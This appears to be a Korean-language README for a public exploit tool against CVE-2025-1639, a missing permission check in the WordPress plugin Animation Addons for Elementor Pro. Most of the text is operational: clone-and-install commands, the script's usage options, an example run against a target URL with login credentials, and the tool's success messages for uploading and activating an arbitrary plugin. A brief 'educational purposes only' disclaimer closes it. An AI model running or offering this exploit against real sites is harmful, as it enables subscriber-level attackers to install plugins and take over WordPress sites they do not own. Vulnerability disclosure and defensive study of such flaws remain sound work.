
Animation Addons for Elementor Pro <= 1.6 - 인증된 (구독자 이상) 사용자에 대한 권한 부족으로 인한 임의의 플러그인 설치/활성화
WordPress용 Elementor Pro용 Animation Addons 플러그인은 install_elementor_plugin_handler() 함수에 대한 누락된 권한 확인으로 인해 모든 버전(최대 1.6 포함)에서 승인되지 않은 임의의 플러그인 설치에 취약합니다. 이로 인해 구독자(Subscriber) 이상의 인증된 공격자가 임의의 플러그인을 설치하고 활성화할 수 있으며, 취약한 사이트에서 Elementor가 활성화되지 않은 경우 피해자를 추가로 감염시키는 데 악용될 수 있습니다.
requests 라이브러리BeautifulSoup 라이브러리git clone https://github.com/Nxploited/CVE-2025-1639.git
cd CVE-2025-1639
pip install -r requirements.txt
usage: CVE-2025-1639.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2025-1639 # By Nxploit | Kaled ALenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PLUGIN, --plugin PLUGIN
Plugin slug to upload and activate (default: wp-maintenance-mode)
-u, --url: 대상 URL-un, --username: WordPress 사용자 이름-p, --password: WordPress 비밀번호-pl, --plugin (선택 사항): 업로드 및 활성화할 플러그인 슬러그 (기본값: wp-maintenance-mode)python CVE-2025-1639.py -u http://example.com/wordpress -un admin -p password -pl wp-maintenance-mode
Logged in successfully.: 로그인 성공을 나타냅니다.The site is vulnerable... Exploiting and uploading the plugin.: 대상 사이트가 취약하며 익스플로잇 및 플러그인 업로드가 진행 중임을 나타냅니다.Plugin uploaded and activated successfully.: 플러그인이 성공적으로 업로드 및 활성화되었음을 나타냅니다.Failed to log in.: 로그인 실패를 나타냅니다.The site is not vulnerable.: 대상 사이트가 취약한 버전을 실행 중이 아님을 나타냅니다.Failed to extract security token.: 익스플로잇에 필요한 보안 토큰 추출 실패를 나타냅니다.Failed to upload and activate the plugin.: 플러그인 업로드 및 활성화 실패를 나타냅니다.이 스크립트는 교육 목적으로만 제공됩니다. 사용에 따른 모든 책임은 사용자 본인에게 있습니다. 작성자는 이 스크립트로 인해 발생하는 어떠한 손해에도 책임을 지지 않습니다.